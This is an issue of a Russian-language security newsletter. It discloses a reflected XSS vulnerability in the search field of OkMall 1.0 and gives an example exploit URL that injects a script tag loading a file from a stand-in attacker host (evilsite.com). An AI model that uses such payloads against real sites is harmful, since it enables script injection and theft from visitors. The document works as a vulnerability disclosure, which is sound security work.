Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в OkMall.


Компьютер для продвинутых пользователей
В этом выпуске:
OkMall
ПО: OkMall
Версия: 1.0

Уязвимость:
Поле поиска не обрабатывается и не фильтруется до выполнения. Это можно использовать для XSS атаки.
Использование:
Через ссылку: http://www.example.com/okmall/demo/search.php?q=a%20%20b%20e%20&mcdir=5&page=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное